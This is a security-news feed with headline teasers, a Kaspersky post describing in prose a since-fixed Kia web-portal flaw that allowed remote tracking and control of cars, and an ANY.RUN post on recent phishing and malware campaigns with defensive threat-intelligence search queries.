Put End-of-Life Software to Rest
Relying on EOL software leaves critical systems exposed — making it a problem no business can afford to ignore.
darkreading – Read More
Abstract Security Raises $15 Million in Series A Funding
Abstract Security has raised $15 million in an oversubscribed Series A funding round led by Munich Re Ventures.
The post Abstract Security Raises $15 Million in Series A Funding appeared first on SecurityWeek.
SecurityWeek – Read More
Cybercriminals Pose a Greater Threat of Disruptive US Election Hacks Than Russian or China
A report distributed by the US Department of Homeland Security warned that financially motivated cybercriminals are more likely to attack US election infrastructure than state-backed hackers.
Security Latest – Read More
How to track Kia car owners online | Kaspersky official blog
A group of security researchers discovered a serious vulnerability in the web portal of the South Korean car manufacturer Kia, which allowed cars to be hacked remotely and their owners tracked. To carry out the hack, only the victim’s car license plate number was needed. Let’s dive into the details.
Overly connected cars
If you think about it, in the last couple of decades, cars have essentially become big computers on wheels. Even the less “smart” models are packed with electronics and equipped with a range of sensors — from sonars and cameras to motion detectors and GPS.
And not only that; in recent years, these computers have been constantly connected to the internet — with all the ensuing risks. Not long ago, we wrote about how today’s cars collect huge amounts of data about their owners and send it to the manufacturer. Moreover, the manufacturers also sell this collected data to other companies — particularly insurers.
However, there’s another side to this issue: being constantly connected to the internet means that, if there are vulnerabilities — either in the car itself or in the cloud system it communicates with — someone could exploit them to hack the system and track the car’s owner without the manufacturer even knowing.
The so-called “head unit” of a car is just the tip of the iceberg; in fact, today’s cars are stuffed with electronics
One bug to rule them all, one bug to find them
This is exactly what happened in this case. Researchers found a vulnerability in Kia’s web portal, which is used by Kia owners and dealers. It turned out that by using the API, the portal allowed anyone to register as a car dealer with just a few fairly simple moves.
The Kia portal in which a serious vulnerability was discovered. Source
This gave the attacker access to features that even car dealers shouldn’t have — at least, not once the vehicle has been handed over to the customer. Specifically, the portal permits first finding any Kia car, and then accessing the owner’s data (name, phone number, email address, and even physical address) — all with just the vehicle’s VIN number.
It should be noted that VIN numbers aren’t exactly secret information — in some countries, they’re publicly available. For instance, in the USA there are many online services you can use to look up a VIN number using a car’s license plate number.
A general scheme of the Kia web portal attack, allowing control over any car using its VIN number. Source
After successfully finding the car, the attacker can use the owner’s data to register any attacker-controlled account in Kia’s system as a new user for the vehicle. From there, the attacker would gain access to various functions normally available to the car’s actual owner through the mobile app.
What’s particularly interesting is that all these features weren’t just available to the dealer who sold that car, but to any dealer registered in Kia’s system.
Hacking a car in seconds
The researchers then developed an experimental app that could take control of any Kia vehicle within seconds simply by entering its license plate number into the input fields. The app would automatically find the car’s VIN through the relevant service and use it to register the vehicle to the researchers’ account.
The researchers even created a handy app to simplify hacking — all you need is the Kia car’s license plate number. Source
After that, a single button press in the app would allow the attacker to obtain the vehicle’s current coordinates, lock or unlock the doors, start or stop the engine, or honk the horn.
The app could be used to obtain the hacked car’s coordinates and send commands. Source
It’s important to note that in most cases these functions wouldn’t be enough to steal the car. Modern models are usually equipped with immobilizers, which require the physical presence of the key to be disabled. There are some exceptions, but generally these are the cheapest cars that are unlikely to be of much interest to thieves.
Nevertheless, this vulnerability could easily be used to track the car owner, steal valuables left inside the car (or plant something there), or simply disrupt the driver’s life with unexpected actions from the vehicle.
The researchers followed responsible disclosure protocol, informing the manufacturer of the issue and only publishing their findings after Kia fixed the bug. However, they note that they’ve found similar vulnerabilities before and are confident they’ll continue to discover more in the future.
Kaspersky official blog – Read More
AP Sources: Chinese Hackers Targeted Phones of Trump, Vance, People Associated With Harris Campaign
Chinese hackers engaged in a broader espionage operation targeted cellphones used by Donald Trump, JD Vance, and the Kamala Harris campaign.
The post AP Sources: Chinese Hackers Targeted Phones of Trump, Vance, People Associated With Harris Campaign appeared first on SecurityWeek.
SecurityWeek – Read More
‘All servers’ for Redline and Meta infostealers hacked by Dutch police and FBI
Authorities said Operation Magnus “gained full access” to the servers for malware known as Redline and Meta, both of which are popular among cybercriminals.
The Record from Recorded Future News – Read More
Is Firefox Password Manager Secure?
Like other password managers, there are risks and drawbacks to consider before trusting Firefox Password Manager with your credentials.
Security | TechRepublic – Read More
Four REvil Ransomware Group Members Sentenced to Prison in Russia
Four members of the REvil ransomware group, arrested in 2022, were last week sentenced to prison by a Russian court.
The post Four REvil Ransomware Group Members Sentenced to Prison in Russia appeared first on SecurityWeek.
SecurityWeek – Read More
Recent Cyber Attacks Discovered by ANY.RUN: October 2024
Identifying new cyber threats is no simple task. They’re always evolving, adapting, and finding new ways to slip through the defenses.
But no stress—ANY.RUN has you covered!
Our team of researchers are always on the lookout, analyzing the latest attacks to keep you informed.
In this article, we’re sharing some of the most recent threats our team has uncovered over the past month. Let’s dive in and see what’s out there!
APT-C-36, aka BlindEagle, Campaign in LATAM
APT-C-36, better known as BlindEagle, is a group that has been actively targeting the LATAM region for years. Their primary goal? To gain remote control of victims’ devices through continuous phishing attacks, installing Remote Access Tools (RATs) like Remcos and AsyncRAT for financial gain.
Attack details
Information on of the APT-C-36 attack
We discovered that in recent cases attackers invite victims to an online court hearing via email. This official-sounding invitation creates a sense of urgency, pushing the target to download the malicious payload.
You can view analysis of this attack inside ANY.RUN’s sandbox.
Phishing email with fake invitation in ANY.RUN’s sandbox
To deliver their malware, BlindEagle often relies on well-known online services, such as:
Discord
Google Drive
Bitbucket
Pastee
YDRAY
This tactic helps them bypass certain security filters since these services are typically trusted by users.
The malicious payload is stored in the archive, which is usually protected by a password that can be found in the initial email.
Thanks to ANY.RUN’s interactivity, you can manually enter the password right inside the sandbox.
As mentioned, BlindEagle use Remcos and AsyncRAT as their primary tools for remote access. The current attack involved Remcos distribution.
ANY.RUN provides helpful tags specifying the identified threats
In the current analysis session, we observed a Remcos RAT connection attempting communication with a Command and Control (C2) server.
Remcos command and control activity detected
This activity involves establishing TLS connection to an external server, which was immediately flagged by a Suricata IDS rule in the ANY.RUN sandbox.
Threat Intelligence on APT-C-36 attacks
To collect intel on other attacks belonging to BlindEagle’s campaigns, you can use ANY.RUN’s Threat Intelligence Lookup:
Specify the country from where the phishing sample originated:
submissionCountry:”Co”
Filter for sessions that involve an email client, like Outlook:
commandLine:”OUTLOOK.EXE”
Since the payload is often stored in an archive, filter for an archiving tool, such as WinRAR:
commandLine:”WinRAR”
Look for sessions flagged as suspicious or malicious:
threatLevel:”malicious”
To find active RATs like Remcos, add a condition for Remote Access Tools:
threatName:”rat”
Here is the final query:
The search takes just a few seconds and reveals a wealth of information.
The service returns a hundred samples of APT-C-36 and other similar attacks
TI Lookup offers a list of samples matching the query each with their corresponding sandbox analysis. You can navigate to any sandbox session of your interest to explore these threats further.
Fake CAPTCHA Exploitation to Deliver Lumma
Another phishing campaign discovered by ANY.RUN’s team exploited fake CAPTCHA prompts to execute malicious code, delivering Lumma malware onto victims’ systems.
Attack details
Fake CAPTCHA attack
In this phishing attack, victims were lured to a compromised website and asked to complete a CAPTCHA. They either needed to verify their human identity or fix non-existent display errors on the page.
The campaign included different fake messages
Once the user clicked the fake CAPTCHA button, the attackers prompted them to copy and run a malicious PowerShell script through the Windows “Run” function (WIN+R).
Malicious process execution via PowerShell shown in the ANY.RUN sandbox
The instruction deceived users into executing harmful code, leading to system infection with Lumma malware for further exploitation.
More samples of the campaign
For further investigation into attacks leveraging fake CAPTCHA prompts, you can use ANY.RUN’s TI Lookup to locate additional samples and associated data.
As part of your search query, you can use a domain involved in the attack:
TI Lookup identifies the domain as malicious and offers additional threat context
This query reveals multiple related domains, IP addresses, and sandbox sessions tied to the attacks outlined above.
Abuse of Encoded JavaScript
We also identified a growing use of encoded JavaScript files for hidden script execution.
Microsoft originally developed Script Encoder as a way for developers to obfuscate JavaScript and VBScript, making the code unreadable while remaining functional through interpreters like wscript.
Intended as a protective measure, Script Encoder has also become a resource for attackers. By encoding harmful JavaScript in .jse files, cybercriminals can embed malware in scripts that look legitimate, tricking users into running the malicious code.
Steps for decoding a JS script
This type of obfuscation not only conceals the code but also complicates detection, as security tools struggle to identify the harmful intent within encrypted data.
Encoded .jse files are commonly delivered through phishing emails or drive-by-downloads.
See analysis of a .jse file disguised as a calculator software in the ANY.RUN sandbox.
The ANY.RUN sandbox lets you see how a script executes
Using the built-in Script Tracer feature, you can view entire script execution process to avoid manual decryption.
Conclusion
Our analysts are constantly on the lookout for emerging phishing and malware attacks, as well as new malicious techniques used by cyber criminals. To stay updated on the latest research of ANY.RUN’s team, make sure to follow us on X, LinkedIn, YouTube, Facebook, and other social media.
About ANY.RUN
ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.
With ANY.RUN you can:
Detect malware in seconds
Interact with samples in real time
Save time and money on sandbox setup and maintenance
Record and study all aspects of malware behavior
Collaborate with your team
Scale as you need
The post Recent Cyber Attacks Discovered by ANY.RUN: October 2024 appeared first on ANY.RUN’s Cybersecurity Blog.
ANY.RUN’s Cybersecurity Blog – Read More
Delta Sues Cybersecurity Firm CrowdStrike Over Tech Outage That Canceled Flights
Delta Air Lines has sued CrowdStrike, claiming the cybersecurity company had cut corners and caused a worldwide technology outage that led to thousands of canceled flight in July.
The post Delta Sues Cybersecurity Firm CrowdStrike Over Tech Outage That Canceled Flights appeared first on SecurityWeek.
SecurityWeek – Read More